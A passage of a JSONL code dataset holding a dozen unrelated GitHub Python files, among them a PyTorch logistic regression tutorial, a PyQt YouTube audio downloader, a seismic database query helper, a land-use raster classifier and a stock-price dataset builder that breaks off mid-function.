+{"seq_id":"28208022805","text":"#!/usr/bin/env python3\r\n\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\n\r\nresultfile = sys.argv[1]\r\n\r\nx = []\r\ny = []\r\n\r\ndef get_graph():\r\n    # each line of the result file holds \"<name> <score>\"\r\n    with open(resultfile, 'r') as fp:\r\n        data = fp.readlines()\r\n\r\n    for i in data:\r\n        tempx = (i.split())[0]\r\n        tempy = (i.split())[1]\r\n        x.append(tempx)\r\n        y.append(int(tempy))\r\n\r\n    plt.ylim(1, 100)\r\n    plt.title(\"Exam Score-2020\", fontsize=24)\r\n    plt.xlabel(\"Name\", fontsize=14)\r\n    plt.ylabel(\"Score\", fontsize=14)\r\n    plt.plot(x, y)\r\n    plt.show()\r\n    return\r\n\r\nif __name__ == '__main__':\r\n    get_graph()\r\n","repo_name":"allenshi86/Python","sub_path":"Graphical_data/Graphical_data_matplotlib.py","file_name":"Graphical_data_matplotlib.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"31695596875","text":"'''\nDescription: Logistic regression\nVideo: https://www.bilibili.com/video/BV1Y7411d7Ys?p=6\nBlog: https://blog.csdn.net/bit452/article/details/109680909\nAuthor: HCQ\nCompany(School): UCAS\nEmail: 1756260160@qq.com\nDate: 2020-12-05 16:53:13\nLastEditTime: 2020-12-05 17:12:56\nFilePath: /pytorch/PyTorch深度学习实践/06逻辑回归.py\n'''\n\n\nimport torch\n# import torch.nn.functional as F\n\n# 1 prepare dataset\nx_data = torch.Tensor([[1.0], [2.0], [3.0]])\ny_data = torch.Tensor([[0], [0], [1]])  # binary class labels instead of regression targets\n\n# 2 design model using class\nclass LogisticRegressionModel(torch.nn.Module):\n    def __init__(self):\n        super(LogisticRegressionModel, self).__init__()\n        self.linear = torch.nn.Linear(1, 1)\n\n    def forward(self, x):\n        # y_pred = F.sigmoid(self.linear(x))\n        y_pred = torch.sigmoid(self.linear(x))  # sigmoid squashes the linear output into (0, 1)\n        return y_pred\n\nmodel = LogisticRegressionModel()\n\n# 3 construct loss and optimizer\n# By default the loss is averaged over elements; with size_average=False it is summed instead.\ncriterion = torch.nn.BCELoss(size_average=False)  # binary cross-entropy loss\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01)\n\n# 4 training cycle forward, backward, update\nfor epoch in range(1000):\n    y_pred = model(x_data)\n    loss = criterion(y_pred, y_data)\n    print(epoch, loss.item())\n\n    optimizer.zero_grad()\n    loss.backward()\n    optimizer.step()\n\nprint('w = ', model.linear.weight.item())\nprint('b = ', model.linear.bias.item())\n\nx_test = torch.Tensor([[4.0]])\ny_test = model(x_test)\nprint('y_pred = ', y_test.data)\n\n\n# Visualization\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nx = np.linspace(0, 10, 200)\nx_t = torch.Tensor(x).view((200, 1))\ny_t = model(x_t)  # run the trained model\ny = y_t.data.numpy()\nplt.plot(x, y)\nplt.plot([0, 10], [0.5, 0.5], c='r')\nplt.xlabel('Hours')\nplt.ylabel('Probability of Pass')\nplt.grid()\nplt.show()\n\n\n\n","repo_name":"HuangCongQing/pytorch","sub_path":"PyTorch深度学习实践/06逻辑回归.py","file_name":"06逻辑回归.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"79"}
+{"seq_id":"42384295901","text":"def decrypt(library, message):\r\n    \"\"\"\r\n    Return the decoded message as a string.\r\n    library: a list of strings, each holding \"value key\"\r\n    message: a string of space-separated code words\r\n    \"\"\"\r\n\r\n    # Make lists of keys and values\r\n    keys = []\r\n    values = []\r\n    for entry in library:\r\n        entry = entry.split()\r\n        keys.append(entry[1])\r\n        values.append(entry[0])\r\n\r\n    # Decode the message\r\n    decoded = ''\r\n    message = message.split()\r\n    for m in range(len(message)):\r\n        for k in range(len(keys)):\r\n            if message[m] == keys[k]:\r\n                decoded += values[k]\r\n        if message[m] not in keys:\r\n            decoded += '?'\r\n    return decoded","repo_name":"Lihong062/CS101","sub_path":"APTs/APT-4/MorseLikeCode.py","file_name":"MorseLikeCode.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
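A dictionary makes the same lookup direct instead of scanning parallel lists on every code word; a sketch assuming the same "value key" entry format as above:

def decrypt_dict(library, message):
    # build a code -> value table once, then decode in a single pass
    table = {}
    for entry in library:
        value, key = entry.split()
        table[key] = value
    return ''.join(table.get(code, '?') for code in message.split())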
+{"seq_id":"27713867039","text":"import csv\nclass Product:\n\n def __init__(self, product_id, category):\n self.product_id = product_id\n self.category = category\n\n if any(v is None for v in [self.product_id, self.category]):\n raise ValueError('Arguments missing')\n\n def __str__(self):\n return \"Product: {}, Category: {}\".format(\n self.product_id,\n self.category\n )\n\n\ndef load_catalog_from_file(filename):\n catalog = {}\n with open(filename) as f:\n csvReader = csv.reader(f)\n for line in csvReader:\n product = Product(product_id=line[0], category=line[5])\n catalog[product.product_id] = product.category\n return catalog\n","repo_name":"AneliyaPPetkova/Programming","sub_path":"Python/7.SupermarketsDataAnalysis/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
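A hypothetical usage sketch of the loader above; the file name and product id are illustrative assumptions, while the loader itself expects the category in column index 5 of each CSV row:

catalog = load_catalog_from_file("products.csv")  # hypothetical file name
print(catalog.get("P-001", "unknown"))            # hypothetical product id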
+{"seq_id":"73289684736","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom img import img\nimport sys\nimport pytube as pt\nimport os\nimport moviepy.editor as mp\nimport subprocess\n\n\n\nclass Ui_Dialog(object):\n def setupUi(self, Dialog):\n Dialog.setObjectName(\"Dialog\")\n Dialog.resize(400, 286)\n Dialog.setMinimumSize(QtCore.QSize(400, 286))\n Dialog.setMaximumSize(QtCore.QSize(400, 286))\n self.label = QtWidgets.QLabel(Dialog)\n self.label.setGeometry(QtCore.QRect(0, -8, 401, 301))\n self.label.setStyleSheet(\"background-color: rgb(66, 66, 66);\")\n self.label.setText(\"\")\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(Dialog)\n self.label_2.setGeometry(QtCore.QRect(0, 0, 401, 61))\n self.label_2.setStyleSheet(\"image: url(:/img/Settings2_00000.png);\")\n self.label_2.setText(\"\")\n self.label_2.setObjectName(\"label_2\")\n self.label_3 = QtWidgets.QLabel(Dialog)\n self.label_3.setGeometry(QtCore.QRect(10, 90, 141, 61))\n self.label_3.setStyleSheet(\"image: url(:/img/AdMusic_00000.png);\")\n self.label_3.setText(\"\")\n self.label_3.setObjectName(\"label_3\")\n self.label_4 = QtWidgets.QLabel(Dialog)\n self.label_4.setGeometry(QtCore.QRect(0, -40, 441, 371))\n self.label_4.setStyleSheet(\"image: url(:/img/settingsFundo_00000.png);\")\n self.label_4.setText(\"\")\n self.label_4.setObjectName(\"label_4\")\n self.lineEdit = QtWidgets.QLineEdit(Dialog)\n self.lineEdit.setGeometry(QtCore.QRect(140, 110, 211, 20))\n self.lineEdit.setStyleSheet(\"QLineEdit { \\n\"\n\" border-color: rgb(85, 0, 255);\\n\"\n\" background-color: rgb(222, 222, 222);\\n\"\n\" color: rgb(0, 0, 0);\\n\"\n\"}\\n\"\n\"QLineEdit:hover {\\n\"\n\" border:2px solid rgb(45, 45, 45);\\n\"\n\"}\\n\"\n\"QLineEdit:focus {\\n\"\n\" border:2px solid rgb(0, 0, 0);\\n\"\n\"\\n\"\n\"}\\n\"\n\"\")\n self.lineEdit.setObjectName(\"lineEdit\")\n self.pushButton = QtWidgets.QPushButton(Dialog)\n self.pushButton.setGeometry(QtCore.QRect(290, 140, 61, 31))\n self.pushButton.setStyleSheet(\"QPushButton {\\n\"\n\" image: url(:/img/Add_00000.png);\\n\"\n\" background-color: rgba(205, 205, 205, 0);\\n\"\n\" boder-radius: 5px;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" \\n\"\n\" image: url(:/img/AddHigh_00000.png);\\n\"\n\"}\\n\"\n\"QPushButton:pressed{\\n\"\n\" image: url(:/img/Add_00000.png);\\n\"\n\"}\")\n self.pushButton.setText(\"\")\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_2 = QtWidgets.QPushButton(Dialog)\n self.pushButton_2.setGeometry(QtCore.QRect(140, 210, 141, 71))\n self.pushButton_2.setStyleSheet(\"QPushButton {\\n\"\n\" \\n\"\n\" image: url(:/img/viewmusic_00000.png);\\n\"\n\" background-color: rgba(205, 205, 205, 0);\\n\"\n\" boder-radius: 5px;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" image: url(:/img/viewmusic2_00000.png);\\n\"\n\"}\\n\"\n\"QPushButton:pressed{\\n\"\n\" image: url(:/img/viewmusic_00000.png);\\n\"\n\"}\")\n self.pushButton_2.setText(\"\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n\n self.retranslateUi(Dialog)\n QtCore.QMetaObject.connectSlotsByName(Dialog)\n\n self.pushButton.clicked.connect(self.add_music)\n self.pushButton_2.clicked.connect(self.view_music)\n\n\n def retranslateUi(self, Dialog):\n _translate = QtCore.QCoreApplication.translate\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.lineEdit.setPlaceholderText(_translate(\"Dialog\", \"enter the URL of the song \"))\n\n def view_music(self):\n path = './musics'\n path = os.path.realpath(path)\n os.startfile(path)\n\n def 
add_music(self):\n        try:\n            # Download from YouTube\n            os.makedirs('./musics', exist_ok=True)\n            url = self.lineEdit.text()\n            stream = pt.YouTube(url=url).streams.get_audio_only()\n            stream.download()\n            title = str(stream.title)\n\n            # Convert mp4 to mp3\n            clip = mp.AudioFileClip(title + '.mp4')\n            clip.write_audiofile('musics/' + title + '.mp3')\n\n            # Remove the intermediate mp4\n            os.remove(title + '.mp4')\n        except:\n            error = QtWidgets.QMessageBox()\n            error.setWindowTitle(\"Error\")\n            error.setIcon(QtWidgets.QMessageBox.Critical)\n            error.setText(\"Unable to download, error found\")\n            error.exec()\n        else:\n            msg = QtWidgets.QMessageBox()\n            msg.setWindowTitle(\"Done\")\n            msg.setIcon(QtWidgets.QMessageBox.Information)\n            msg.setText(\"Your music was successfully downloaded\")\n            msg.exec()\n\n    def retranslateUi(self, Dialog):\n        # this later definition overrides the earlier one, so it sets the\n        # window title, the placeholder text and the window icon together\n        _translate = QtCore.QCoreApplication.translate\n        Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n        self.lineEdit.setPlaceholderText(_translate(\"Dialog\", \"enter the URL of the song \"))\n        Dialog.setWindowIcon(QtGui.QIcon('img/settings_00000'))\n\n\nif __name__ == \"__main__\":\n    import sys\n    app = QtWidgets.QApplication(sys.argv)\n    Dialog = QtWidgets.QDialog()\n    ui = Ui_Dialog()\n    ui.setupUi(Dialog)\n    Dialog.show()\n    app.exec_()","repo_name":"eumaninho54/MusicPlayer","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"20507478087","text":"#!/usr/bin/env python3\r\n\r\nfrom priority_queue_112 import PQ\r\nimport sys\r\nm = int(sys.argv[1])\r\n\r\ndef desc(t):\r\n return t[1]\r\n\r\ndef main():\r\n queue = PQ()\r\n # read first m elements into the queue\r\n i = 0\r\n while i < m:\r\n num = int(sys.stdin.readline().rstrip())\r\n queue.insert(num)\r\n\r\n i += 1\r\n\r\n # get the minimum M numbers from stdin\r\n for element in sys.stdin:\r\n element = int(element.rstrip())\r\n if element < queue.getMax():\r\n queue.insert(element)\r\n queue.delMax()\r\n\r\n while not(queue.is_empty()):\r\n # print(queue.d, queue.N)\r\n print(queue.delMax())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ClassicRevive/labwork","sub_path":"ca117/lab20/minelts_112.py","file_name":"minelts_112.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
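The standard library can express the same "smallest m of a stream" pattern without a hand-rolled max-priority-queue; a sketch using heapq, which maintains a bounded heap internally just like the PQ loop above:

import heapq
import sys

def min_elements(m, lines):
    # nsmallest keeps at most m candidates at a time while scanning the stream
    return heapq.nsmallest(m, (int(line) for line in lines))

# usage sketch: print('\n'.join(map(str, min_elements(5, sys.stdin))))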
+{"seq_id":"72603076735","text":"from microquake.core.stream import Trace, Stream\nfrom microquake.core.settings import settings\nimport numpy as np\nfrom obspy.core import UTCDateTime\nfrom loguru import logger\nfrom microquake.db.models.alchemy import ContinuousData\nfrom microquake.db.connectors import connect_timescale\nfrom datetime import datetime\nfrom sqlalchemy import desc\nfrom pytz import utc\n\n\ndef get_continuous_data(start_time, end_time, sensor_id=None):\n\n db_lag = get_db_lag()\n logger.info(f'the database lag is {db_lag} seconds')\n\n if type(start_time) is datetime:\n start_time = UTCDateTime(start_time)\n\n if type(end_time) is datetime:\n end_time = UTCDateTime(end_time)\n\n session, engine = connect_timescale()\n inventory = settings.inventory\n\n e_time = end_time.datetime\n s_time = start_time.datetime\n\n network_code = inventory.networks[0].code\n\n t = ContinuousData.time\n et = ContinuousData.end_time\n sid = ContinuousData.sensor_id\n\n if sensor_id is None:\n logger.info('requesting data for all sensors')\n cds = session.query(ContinuousData).filter(t <= e_time,\n et > s_time)\n else:\n if inventory.select(sensor_id) is None:\n logger.error(f'the sensor {sensor_id} is not in the inventory')\n\n return\n logger.info(f'requesting data for sensor {sensor_id}')\n cds = session.query(ContinuousData).filter(t <= e_time,\n et > s_time,\n sid == sensor_id)\n\n traces = []\n for cd in cds:\n x = np.array(cd.x)\n y = np.array(cd.y)\n z = np.array(cd.z)\n tr_x = Trace(data=x)\n tr_x.stats.starttime = UTCDateTime(cd.time)\n tr_x.stats.sampling_rate = cd.sample_rate\n tr_x.stats.channel = 'X'\n tr_x.stats.station = str(cd.sensor_id)\n tr_x.stats.network = network_code\n traces.append(tr_x)\n tr_y = Trace(data=y)\n tr_y.stats.starttime = UTCDateTime(cd.time)\n tr_y.stats.sampling_rate = cd.sample_rate\n tr_y.stats.channel = 'Y'\n tr_y.stats.station = str(cd.sensor_id)\n tr_y.stats.network = network_code\n traces.append(tr_y)\n tr_z = Trace(data=z)\n tr_z.stats.starttime = UTCDateTime(cd.time)\n tr_z.stats.sampling_rate = cd.sample_rate\n tr_z.stats.channel = 'Z'\n tr_z.stats.station = str(cd.sensor_id)\n tr_z.stats.network = network_code\n traces.append(tr_z)\n\n time_now = UTCDateTime.now()\n delay = time_now - end_time\n\n st = Stream(traces=traces).trim(starttime=start_time, endtime=end_time)\n\n if st is None:\n logger.warning(f'no data recovered from the database! '\n f'the current database lag is {db_lag}')\n return None\n\n duration = (end_time - start_time)\n\n trs = []\n # st = st.merge(fill_value=np.nan)\n for i, tr in enumerate(st):\n expected_number_sample = tr.stats.sampling_rate * duration\n if np.all(tr.data == 0):\n logger.warning(f'data from sensor {tr.stats.station} contains '\n f'only zero. The trace will not be kept')\n continue\n elif np.any(np.isnan(tr.data)):\n logger.warning(f'data from sensor {tr.stats.station} contains '\n f'some NaN. The trace will not be kept')\n continue\n elif len(tr) < 0.9 * expected_number_sample:\n logger.warning(f'data from sensor {tr.stats.station} contains '\n f'too little data. 
The trace will not be kept')\n            continue\n\n        trs.append(tr)\n\n    if not trs:\n        return None\n\n    st = Stream(traces=trs).trim(starttime=start_time,\n                                 endtime=end_time)\n\n    session.close()\n    engine.dispose()\n\n    return st.detrend('demean')\n\n\ndef get_db_lag(percentile=75):\n    \"\"\"\n    returns the database lag in seconds\n    :param percentile: percentile of data to use to determine the delay.\n    For instance, if percentile = 75, 75 percent of the traces will have a lag\n    of less than the returned value.\n    :return: lag in seconds\n    \"\"\"\n\n    session, engine = connect_timescale()\n\n    inventory = settings.inventory\n    t = ContinuousData.time\n    sensor_id = ContinuousData.sensor_id\n\n    times = []\n    for sensor in inventory.stations():\n\n        records = session.query(t, sensor_id).filter(\n            sensor_id == sensor.code).order_by(desc(t)).limit(1)\n\n        for record in records:\n            times.append(record.time.timestamp())\n\n    if not times:\n        return None\n\n    time = datetime.utcfromtimestamp(np.percentile(times, percentile))\n\n    lag = datetime.utcnow().replace(tzinfo=utc) - time.replace(tzinfo=utc)\n\n    session.close()\n    engine.dispose()\n\n    return lag.total_seconds()\n\n\n","repo_name":"jeanphilippemercier/microquake","sub_path":"microquake/core/helpers/timescale_db.py","file_name":"timescale_db.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"10638349506","text":"#!/usr/bin/ennv python\n\nimport json\n\n\nwith open('../data/categories.json', 'r') as f:\n categories = json.load(f)\n\ntop_level_categories = [c for c in categories\n if (c['parents'] == []) and ('US' in c.get('country_whitelist', ['US']))]\n","repo_name":"philpot/yelp91030","sub_path":"src/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"2151501726","text":"# load model\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport model as m\n\nmodel = tf.keras.models.load_model('saved_model/TGA_model')\n\n# Check its architecture\nmodel.summary()\n\n\n# make predictions\ndef inputPrediction(inputText):\n\n    # import tokenizer from previous model.py\n    _, tokenizer = m.Tokenization()\n    pred = ''\n    confidence = 0.0\n    inputList = [inputText]\n    for i in range(0, len(inputList)):\n        max_length = 100\n        trunc_type = 'post'\n        sequence = tokenizer.texts_to_sequences(inputList)\n        padded = pad_sequences(sequence, maxlen=max_length, truncating=trunc_type)\n        output = model.predict(padded)\n        if output[i][0] <= 0.5:\n            print(output[i])\n            pred = 'negative'\n            # confidence in the negative class is 1 - P(positive)\n            confidence += 1 - output[i][0]\n        else:\n            print(output[i])\n            pred = 'positive'\n            confidence += output[i][0]\n\n        print('Review: ' + inputList[i] + '\\n' + 'Sentiment: ' + pred + ' ' + str(output[i][0]) + '\\n' + '\\n')\n    return pred, confidence\n\nsample = \"happy good wonderful\"\n\ninputPrediction(sample)","repo_name":"mshah016/app","sub_path":"appTEST/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"10271301860","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 8 21:29:47 2018\n\n@author: Chinmay\n\"\"\"\n\nimport numpy as np\nimport gdal\nfrom gdalconst import *\nimport matplotlib.pyplot as plt\n\n# input path\ninputpath = 'D:/Chinmay/Pune/Analysis_06_06_2018/NITK_RSGIS_20180824_154257/Outputs/LT05_L1TP_147047_19900318_20170131_01_T1.tar/LT5[147_047](1990-03-18_04-48)'\n\n\n# read spectral indices into numpy arrays\nndvidata = gdal.Open(inputpath + 'NDVI.TIF', GA_ReadOnly)\nNDVI = np.array(ndvidata.GetRasterBand(1).ReadAsArray())\nndwidata = gdal.Open(inputpath + 'NDWI.TIF', GA_ReadOnly)\nNDWI = np.array(ndwidata.GetRasterBand(1).ReadAsArray())\nndbidata = gdal.Open(inputpath + 'NDBI_01.TIF', GA_ReadOnly)\nNDBI = np.array(ndbidata.GetRasterBand(1).ReadAsArray())\nndbaidata = gdal.Open(inputpath + 'NDBaI_01.TIF', GA_ReadOnly)\nNDBAI = np.array(ndbaidata.GetRasterBand(1).ReadAsArray())\nmndwidata = gdal.Open(inputpath + 'MNDWI_01.TIF', GA_ReadOnly)\nMNDWI = np.array(mndwidata.GetRasterBand(1).ReadAsArray())\n\n\n# create dictionary of thresholds to be used for each spectral index to be\n# classified into a thematic raster class\nthresholds = {\"Wat_MNDWI\": 0.3,\n              \"Veg_NDVI\": 0.3,\n              \"Veg_NDWI1\": 0.0,\n              \"Veg_NDWI2\": 0.3,\n              \"Veg_NDBI1\": -0.02,\n              \"Veg_NDBI2\": -0.2,\n              \"Veg_NDBaI1\": -0.3,\n              \"Veg_NDBaI2\": -0.6,\n              \"Sed_NDBaI1\": -0.6,\n              \"Sed_NDBaI2\": 0.75,\n              \"Built_NDVI\": 0.02,\n              \"Built_NDWI\": 0.2,\n              \"Built_NDBI\": 0.15,\n              \"Built_NDBaI\": -0.25,\n              \"Fallow_NDVI\": 0.2,\n              \"Fallow_NDWI1\": -0.1,\n              \"Fallow_NDWI2\": -0.25,\n              \"Fallow_NDBI1\": 0.1,\n              \"Fallow_NDBI2\": 0.3,\n              \"Fallow_NDBaI\": -0.3\n              }\n\n\ndef lulc_classify(NDVI, NDBI, NDBAI, NDWI, MNDWI):\n    \"\"\"\n    Classify the spectral index rasters into a single thematic LULC raster\n    using the thresholds defined above.\n    Class codes: 2 = sediment/river bed, 3 = built-up, 5 = fallow land;\n    the water (1) and vegetation (4) rules are kept commented out below.\n    \"\"\"\n    # create an empty raster of the same size as the input indices\n    Classified_raster = np.zeros(NDVI.shape)\n\n    # Water\n    # Classified_raster[np.where(MNDWI >= thresholds[\"Wat_MNDWI\"])] = 1\n\n    # Sediment/river bed\n    # assumed: NDBaI lies between the two sediment thresholds (the original\n    # comparison directions made this condition unsatisfiable)\n    Classified_raster[np.where(np.logical_and(NDBAI >= thresholds[\"Sed_NDBaI1\"],\n                                              NDBAI <= thresholds[\"Sed_NDBaI2\"]))] = 2\n\n    # Built-up area\n    Classified_raster[np.where(np.logical_and(NDVI < thresholds[\"Built_NDVI\"],\n                                              NDWI < thresholds[\"Built_NDWI\"]) &\n                               np.logical_and(NDBI >= thresholds[\"Built_NDBI\"],\n                                              NDBAI < thresholds[\"Built_NDBaI\"]))] = 3\n\n    # Vegetation\n    # Classified_raster[np.where(np.logical_and(NDWI > thresholds[\"Veg_NDWI1\"], NDWI < thresholds[\"Veg_NDWI2\"]) &\n    #                            (NDVI > thresholds[\"Veg_NDVI\"]) &\n    #                            np.logical_and(NDBI > thresholds[\"Veg_NDBI2\"], NDBI < thresholds[\"Veg_NDBI1\"]) &\n    #                            np.logical_and(NDBAI > thresholds[\"Veg_NDBaI2\"], NDBAI < thresholds[\"Veg_NDBaI1\"]))] = 4\n\n    # Fallow land\n    Classified_raster[np.where(np.logical_and(NDBI > thresholds[\"Fallow_NDBI1\"],\n                                              NDBI <= thresholds[\"Fallow_NDBI2\"]) &\n                               np.logical_and(NDWI >= thresholds[\"Fallow_NDWI2\"],\n                                              NDWI < thresholds[\"Fallow_NDWI1\"]) &\n                               (NDVI < thresholds[\"Fallow_NDVI\"]) &\n                               (NDBAI < thresholds[\"Fallow_NDBaI\"]))] = 5\n\n    return Classified_raster\n","repo_name":"devalc/Dtree_Lulc","sub_path":"classify_spectral_indices_into_lulc.py","file_name":"classify_spectral_indices_into_lulc.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13452920805","text":"from core.item import ItemEnum\n\n\nclass Room:\n    \"\"\"\n    A class representing a room in the map.\n\n    Args:\n        name (str): The name of the room.\n        description (str): The description of the room.\n    \"\"\"\n\n    def __init__(self, name: str, description: str):\n        self.name = name\n        self.description = description\n\n\nclass Map:\n    \"\"\"\n    A class representing the game map.\n    \"\"\"\n\n    map = {\n        \"Starting Room\": {\n            \"north\": \"North Hallway\",\n            \"south\": None,\n            \"east\": None,\n            \"west\": None,\n        },\n        \"North Hallway\": {\n            \"north\": None,\n            \"south\": \"Starting Room\",\n            \"east\": \"North East Wing\",\n            \"west\": \"North West Wing\",\n        },\n        \"North West Wing\": {\n            \"north\": None,\n            \"south\": None,\n            \"east\": \"North Hallway\",\n            \"west\": None,\n        },\n        \"North East Wing\": {\n            \"north\": None,\n            \"south\": \"Hidden Room\",\n            \"east\": None,\n            \"west\": \"North Hallway\",\n        },\n        \"Hidden Room\": {\n            \"north\": \"North East Wing\",\n            \"south\": None,\n            \"east\": None,\n            \"west\": None,\n        },\n    }\n\n    danger_levels = {\n        \"Starting Room\": 0,  # No danger\n        \"North Hallway\": 0,  # No danger\n        \"North West Wing\": 20,  # Moderate danger\n        \"North East Wing\": 50,  # High danger\n        \"Hidden Room\": 80,  # Significantly high danger\n    }\n\n    room_danger_message = {\n        \"Starting Room\": \"There is no danger here.\",\n        \"North Hallway\": \"There is no danger here.\",\n        \"North West Wing\": \"\\nThere is poisonous gas here, and you inhaled it. Now your health is significantly reduced.\",  # Moderate danger\n        \"North East Wing\": \"\\nA zombie appeared out of nowhere! He's attacking you, do something!\",  # High danger\n        \"Hidden Room\": \"\\nA witch is here! She cast a spell on you, which is making your skin burn!!\",  # Significantly high danger\n    }\n\n    room_enemy = {\n        \"Starting Room\": None,\n        \"North Hallway\": None,\n        \"North West Wing\": \"Poisonous gas\",\n        \"North East Wing\": \"Zombie\",\n        \"Hidden Room\": \"Witch\",\n    }\n\n    items = {\n        \"North Hallway\": {\"Medicine\": ItemEnum.MEDICINE},\n        \"North West Wing\": {\"Sword\": ItemEnum.SWORD},\n        \"North East Wing\": {\"Wand\": ItemEnum.WAND},\n        \"Hidden Room\": {\"Key\": ItemEnum.KEY},\n    }\n\n    load_room = {\n        \"Starting Room\": Room(\n            \"Starting Room\", \"You find yourself in a dimly lit room.\"\n        ),\n        \"North Hallway\": Room(\n            \"North Hallway\",\n            \"You are in a long hallway with doors to the west and east.\",\n        ),\n        \"North East Wing\": Room(\n            \"North East Wing\", \"You sense something mysterious in this room.\"\n        ),\n        \"Hidden Room\": Room(\n            \"Hidden Room\", \"Congratulations! You found the hidden treasure room!\"\n        ),\n        \"North West Wing\": Room(\n            \"North West Wing\", \"This room seems to be abandoned and dusty.\"\n        ),\n    }\n","repo_name":"akshitverma4/Mystic-Maze","sub_path":"core/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
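A small sketch of how the adjacency dict in Map.map resolves movement; move() here is a hypothetical helper, not part of the original class:

def move(current_room: str, direction: str) -> str:
    # a None (or missing) exit means the move is blocked; stay in place
    destination = Map.map.get(current_room, {}).get(direction)
    return destination if destination else current_room

# move("Starting Room", "north") -> "North Hallway"
# move("Starting Room", "east")  -> "Starting Room" (blocked)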
+{"seq_id":"20561262020","text":"import pandas as pd\nfrom sklearn import preprocessing\nimport numpy as np\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning)\nhistory_points = 50\nfrom db import Db\nimport sys\n\n\ndef get_raw_data(symbol,print_sample=True):\n \n model = Db()\n records = model.get_data(symbol)\n \n data = pd.DataFrame(data = records, \n columns = ['open_val','high_val','low_val','close_val','volume'])\n data = data.drop(0, axis=0)\n if print_sample:\n print(data.head(5))\n print(data.count())\n return data.to_numpy()\n\n\ndef create_dataset(symbol):\n data = get_raw_data(symbol)\n data_normaliser = preprocessing.MinMaxScaler()\n data_normalised = data_normaliser.fit_transform(data)\n ohlcv_histories_normalised = get_ohlcv_histories_normalised(data_normalised)\n\n next_day_open_values_normalised = np.array(\n [data_normalised[:, 0][i + history_points].copy() for i in range(len(data_normalised) - history_points)])\n next_day_open_values_normalised = np.expand_dims(next_day_open_values_normalised, -1)\n\n next_day_open_values = get_next_day_open_values(data)\n\n y_normaliser = get_y_normaliser(next_day_open_values)\n\n technical_indicators_normalised = get_technical_indicators(ohlcv_histories_normalised)\n\n assert ohlcv_histories_normalised.shape[0] == next_day_open_values_normalised.shape[0] == \\\n technical_indicators_normalised.shape[0]\n return ohlcv_histories_normalised, technical_indicators_normalised, next_day_open_values_normalised, \\\n next_day_open_values, y_normaliser\n\ndef get_y_normaliser(data):\n y_normaliser = preprocessing.MinMaxScaler()\n y_normaliser.fit(data)\n return y_normaliser\n\ndef get_next_day_open_values(data):\n next_day_open_values = np.array([data[:, 0][i + history_points].copy() for i in range(len(data) - history_points)])\n next_day_open_values = np.expand_dims(next_day_open_values, -1)\n return next_day_open_values\n\ndef get_ohlcv_histories_normalised(data_normalised, last=0):\n # using the last {history_points} open close high low volume data points, predict the next open value\n if (last == 0):\n rng = range(len(data_normalised) - history_points)\n else:\n rng = range(len(data_normalised) - history_points + 1 - last, len(data_normalised) - history_points + 2)\n return np.array(\n [data_normalised[i:i + history_points].copy() for i in rng])\n\ndef get_next_day_open_values_normalised(data_normalised, last=0):\n # using the last {history_points} open close high low volume data points, predict the next open value\n if (last == 0):\n rng = range(len(data_normalised) - history_points)\n else:\n rng = range(len(data_normalised) - history_points + 1 - last, len(data_normalised) - history_points + 2)\n return np.array(\n [data_normalised[i:i + history_points].copy() for i in rng])\n\n\ndef get_technical_indicators(ohlcv_histories_normalised):\n technical_indicators = []\n for his in ohlcv_histories_normalised:\n # note since we are using his[3] we are taking the SMA of the closing price\n sma = np.mean(his[:, 3])\n macd = calc_ema(his, 12) - calc_ema(his, 26)\n technical_indicators.append(np.array([sma]))\n # technical_indicators.append(np.array([sma,macd,]))\n\n technical_indicators = np.array(technical_indicators)\n\n tech_ind_scaler = preprocessing.MinMaxScaler()\n return tech_ind_scaler.fit_transform(technical_indicators)\n\n\ndef calc_ema(values, time_period):\n sma = np.mean(values[:, 3])\n ema_values = [sma]\n k = 2 / (1 + time_period)\n for i in range(len(values) - time_period, len(values)):\n close = 
